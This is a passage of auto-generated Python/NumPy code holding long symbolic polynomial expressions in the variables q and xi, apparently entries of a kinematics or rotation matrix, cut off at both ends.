252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - 
q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0]) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 
0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 
0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 
1422.22222222222*q[5, 0]**2 + 1) + (-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 
355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - 
q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 
405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 
0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)],
[((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0])) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 
